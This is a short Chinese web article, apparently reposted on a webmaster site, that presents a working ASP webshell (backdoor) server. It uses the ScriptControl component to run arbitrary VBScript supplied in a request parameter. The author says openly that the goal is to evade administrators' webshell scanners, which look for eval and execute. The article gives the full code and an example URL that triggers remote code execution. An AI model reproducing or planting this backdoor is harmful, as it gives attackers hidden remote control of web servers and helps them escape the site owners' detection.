一个相对较新的ASP后门服务端实现代码
发布时间:2023-06-14 14:29:03 所属栏目:Asp教程 来源:
导读:一直很奇怪,为什么客户端里面不是eval,就是execute,不管我藏哪里,管理员用个什么XX webshell扫描器,就能踢我屁股了。
今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用。研究了下方法,后来
今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用。研究了下方法,后来
|
一直很奇怪,为什么客户端里面不是eval,就是execute,不管我藏哪里,管理员用个什么XX webshell扫描器,就能踢我屁股了。 今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用。研究了下方法,后来和lcx讨论了下。得到了如下代码,在此感谢前辈的指点,呵呵。 代码很简单,我就不多做解释了,以免有人骂我装。 复制代码代码如下: <% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SubCode")) '参数SubCode作为过程代码 o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数 '调用示例: 'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29 %> 注意,虽然能用了,但是实验发现只有lake2客户端能用。希望有牛人出来改得通用一点。呵呵。自己写个客户端专用也不错。 (编辑:聊城站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
推荐文章
站长推荐
